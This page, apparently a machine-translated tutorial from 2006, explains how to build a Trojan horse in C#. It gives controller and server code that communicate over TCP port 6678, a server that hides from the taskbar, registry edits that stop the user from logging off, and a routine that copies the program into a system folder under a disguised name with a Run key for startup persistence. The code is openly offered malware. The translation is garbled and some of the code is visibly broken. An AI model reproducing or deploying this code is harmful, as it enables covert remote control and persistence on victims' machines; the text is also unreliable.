Using C # to implement Trojan horse program

Program | trojan

Visitor, Hello! Transfer to Netcom Station | Switch to Telecom station building block Home | More than 500 kinds of Web page effects finishing | Practical Query Function Manual | Block network bt Download Alliance | Classic Jokes | Radio Stations | High-definition classic picture material
Program development web design search engine special effects code operating system Protection virus hacker technology graphic image Computer hardware network technology Server database net article pristine

Your location: Home >> program Development channel >> C # >> text: Title: Use C # to realize Trojan program time: 2006-8-6 Source: Unknown Browse Number: 3 times Trojan Introduction

Because this article is to explore the Trojan horse program, so before introducing some of the basic knowledge of Trojan horse in advance. A complete Trojan system consists of hardware part, software part and concrete connection part. Here mainly to the software part of the introduction, it mainly has control program, trojan program (background service program), Trojan preparation program composition. The control end is used to remotely control the service end of the program; the Trojan program is the procedure that dives into the inside of the service and obtains its operation authority; the Trojan preparation program is set the Trojan horse program's port number, the trigger condition, the Trojan name and so on, causes its in the service end to hide the more

Technology to use:

The control program sends the control code to control the server, the server runs in the background, modifies the registration expression to control the purpose. Technology is not difficult, mainly reflects C # network programming and registry modification.

Control-side development:

The control end sends a control code to the server, the service end (Trojan program) receives the control code, according to the control request, completes the specified request, if the server completes the work, returns the successful information.

Development of the control side:

Control code settings you can set yourself, do not need to be detailed, there are the following key problems.

1. Connection request

was used. Net class, the System.Net.Sockets.TcpClient class in the
TcpClient (string Hostname,int port)
Hostname is the host name to be controlled, of course you can also use IP address.
Port is ports.
System.EventArgs the base class that contains the event data class
private void Button7_click (object sender, System.EventArgs e)
{
Logging operations, adding operational information to the RichTextBox control
Richtextbox1.appendtext ("Request Connection" +textbox1.text + "\ r");
int port = 6678;
Try
{
Initializes a new instance of the TcpClient class and connects to the specified port on the specified host
Client = new TcpClient (textbox1.text,port);
}
Catch
{
MessageBox.Show (the server is not in line!) determines whether the host name is entered. ");
Richtextbox1.appendtext (the server is not in line!) determines whether the host name is entered. ");
}
}//private void Buttion
2. Whether the test is connected with the controlled machine. The process of the program is to send the control code to see if the control side has a reaction, if there is return, the display control success. Provides data flow for network access

Private NetworkStream stream;
The code is as follows:
private void Button8_click (object sender, System.EventArgs e)
{
Record operation
Richtextbox1.appendtext ("Test connection" + "\ r");
Try
{

stream = client. GetStream ();
if (stream. CanWrite)
{
Send control code
String control = "Jiance";
Byte[] by the =system.text.encoding.ascii.getbytes (control. ToCharArray ());
Stream. Write (By,0,by. Length);
Next time you use
Stream. Flush ();
Start a thread that receives back data
Receive is a function of thread execution, see the following analysis
threadreceive = new Thread (new ThreadStart (receive));
Threadreceive.start ();
}
}
catch (Exception ee)
{
Richtextbox1.appendtext (EE. Message+ "\ r");
MessageBox.Show (EE. message);
}
}
3, control the effective code

private void Button9_click (object sender, System.EventArgs e)
{
Here is the control code to be sent, RadioButton is the form control
if (radiobutton1.checked) {control = Form2.zhucex;}
else if (radiobutton2.checked) {control =form3.zhuces;}
else if (radiobutton3.checked) {control = warring;}
else if (radiobutton4.checked) {control =suggest;}
else if (radiobutton5.checked) {control =form4.mumawe;}
else if (radiobutton6.checked) {control =drop;}
if (Control = = "000000")
{
MessageBox.Show ("You did not enter any control target!");
Richtextbox1.appendtext ("You did not enter any control target!");
}
else if (Control!= "000000")
{
Try
{
Logging actions
Richtextbox1.appendtext (Control + "is trying to be controlled, waiting for a response ..." + "\ r");
stream = client. GetStream ();
if (stream. CanWrite)
{
byte[] by = System.Text.Encoding.ASCII.GetBytes (control. ToCharArray ());
Stream. Write (By,0,by. Length);
Stream. Flush ();
Threadreceive =new Thread (new ThreadStart (receive));
Threadreceive.start ();
}//endif
}//try
Catch
{
Richtextbox1.appendtext ("Server not connected 1 invalid!" + "\ r");
MessageBox.Show ("Server not connected 1 invalid!" + "\ r");
}
}//else if
}
4, the function that the thread executes

private void Receive ()
{
Set up space to read data
byte[] bb = new BYTE[3];
Reads 3 bytes, I is the actual number of bytes read
int i = stream. Read (bb,0,3);
Convert to String, if the Chinese control code is used string ss =//system.text.encoding.unicode.getstring (BB);
string ss = System.Text.Encoding.ASCII.GetString (BB);
HJC The return code for the server I set up HJC for connection success, Hkz for control success
if (ss== "HJC")
{
MessageBox.Show ("connected successfully");
Richtextbox1.appendtext ("connected successfully");
}
if (ss== "Hkz")
{
Richtextbox1.appendtext (Control + "controlling success" + "\ r");
MessageBox.Show (Control + "controlling success" + "\ r");
}
}

Service-Side development:

To implement the Trojan service program, the main implementation of the following functions: the background of the operation (hidden technology), control code received and registry changes, the following three aspects to do the introduction:

1, in vc#, it is easy to establish a background service program, first set up a new C # Windows application, the project name is customized (but in order to hide the use of similar to the system name), the form property "ShowInTaskbar" property to False, Let it run without displaying in the taskbar, and set the property "WindowState" property to mininized so that the form can be hidden and running. Of course you can also in InitializeComponent () settings, this function is initialized, run before the form display, the code is as follows:

private void InitializeComponent ()
{
//
Form1
//
Start and size of form display
This. AutoScaleBaseSize = new System.Drawing.Size (6, 14);
This. ClientSize = new System.Drawing.Size (368, 357);
Form name
This. Name = "Form1";
Set properties to run it in the background
This. ShowInTaskbar = false;
This. Text = "Form1";
This. WindowState = System.Windows.Forms.FormWindowState.Minimized;
}
2, the control of the receipt of code, must start at the start of the service program, so the listening thread must be started in the program initialization, so put in the form's constructor, the code annotation is as follows:

Public Form1 ()//form constructors
{
//
Required for Windows Forms Designer support
//
InitializeComponent ();

//
/TODO: Add any constructor code after InitializeComponent call
//Add your listening code
//port you can set it, I use a fixed port
int port =6678;
System.Net.Sockets.TcpListener is the
Listener = new TcpListener (port) that is used to listen for clients on a TCP network;
Initiates a listening
listener. Start ();
//Increase the number of threads receiving the control code, if you want to stop the thread can use Thread.Abort ()
//recontrolcode is the function that the thread initiates execution, this function chooses the appropriate registry modification function according to the received control
//control Code
Thread thread = new Thread (new ThreadStart (Recontrolcode));
Thread. Start ();
}
The Recontrolcode function is as follows, complete code see program
private void Recontrolcode ()
{
//Set receive socket, receive listener. AcceptSocket is the request to return the received client
Socket = listener. AcceptSocket ();
//If the connection successfully executes
while (socket). Connected)
{
///Receive control code
Byte [] by =new byte[6];
int i = socket. Receive (By,by. Length, 0);
String ss = System.Text.Encoding.ASCII.GetString (by);
//performs different functions according to the control code

Modify Registry Add code
Switch (ss)
{
Case "jiance"://test connection, return test information
String str = "HJC";
byte [] bytee = System.Text.Encoding.ASCII.GetBytes (str);
Socket. Send (bytee,0,bytee. length,0);
Break
Case "zx1000":
Modify the registry function, since defined, see the following analysis
Unlogoff ();
Return Control Message
Retmessage ();
Break

Case "zx0100":
modifying registry functions
Unclose ();
Return Control Message
Retmessage ();
Break
Repeat the case function as before, skipping out
Default
Break
}//case
}//while
}//private void Recontrolcode

3, C # in the implementation of the registry changes, the use of. NET class library, which provides two types of classes: the classes that handle events raised by the operating system and the classes that operate on the system registry (SYSTEM.MICROSOFT.WIN32). You can see the use of it below. Here I made a subroutine to modify the registry: make the computer not log off. Before you know the registry, in the subkey Software\\microsoft\\windows\\currentversion\\policies\\explorer
The following setting of the key value Nologoff to 1 makes the computer unable to log off. Use C # to implement modifications to the registry in the following functions:

private void Unlogoff ()
{
The top-level node of the registry that gets the host
Microsoft.Win32.RegistryKey rlocal = registry.localmachine;
Set a variable for a registry subkey
RegistryKey Key1;
Try
{
function Registrykey.opensubkey (string Registrykey,bool canwrite) retrieves the specified subkey
RegistryKey is the user-specified key value, CanWrite is true to modify, default to Fasle cannot be changed
Key1 =
Rlocal.opensubkey ("Software\\microsoft\\windows\\currentversion\\policies\\explorer", true);
Sets the key name of the subkey, and the value
Key1. SetValue ("Nologoff", 1);
Close an open subkey
Key1. Close ();
Warning String setting
MyStr = mystr + "Hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer key value Nologoff be modified!" Please set it to 0! ";
}
catch{}
If you do not have a self build
if (Key1 ==null)
{
Try
{
Use the Registrykey.createsubkey (string mystring) function to create the subkeys you need
RegistryKey Key2 = Rlocal.createsubkey ("Software\\microsoft\\windows\\currentversion\\policies\\explorer");
Key2. SetValue ("Nologoff", 1);
Key2. Close ();
MyStr = mystr + "Hkey_local_machine\\software\\microsoft\\windows\\currentversion\\policies\\explorer key value Nologoff be modified!" Please set it to 0! ";
}
catch{}
}
}
　　4, in the Trojan Horse program also has an important function is the reproduction and transfer of the ego. Trojan Horse to introduce the control of the host must be automatically hidden in the System,system32 directory to prevent the discovery. The code analysis of the transfer is as follows, the main function is to transfer the Trojan horse program under D disk to C:\\winnnt\\system\\msdoss.exe, and change the name at the same time. Use of. NET namespace, which is System.IO to allow synchronous and asynchronous reading and writing of data streams and files. Here we use the System.IO.File class.

private void MoveCC1 ()
{
Try
{
function File.move (string sourcefilename,string destfilename) acts as a moving file
sourceFileName the name of the file to be moved, destfilename as the new path to the file
File.move ("C:\\winnnt\\system\\msdoss.exe", "D:\\winnt\\system32\\expleror.exe");
}
Catch {}
Set the newly moved Trojan to start. Analysis is the same as before
Try
{
Key1 = Rlocal.opensubkey ("Software\\microsoft\\windows\\currentversion\\run", true);
Key1. SetValue ("Microsoftt", "D:\\winnt\\system32\\expleror.exe");
Key1. Close ();
}
catch{}
if (Key1 ==null)
{
Try
{
RegistryKey Key2=rlocal.createsubkey ("Software\\microsoft\\windows\\currentversion\\run");
Key1. SetValue ("Microsoftt", "D:\\winnt\\system32\\expleror.exe");
Key1. Close ();
}
catch{}
}
}//movecc1 ()
Here a simple C # Trojan is done.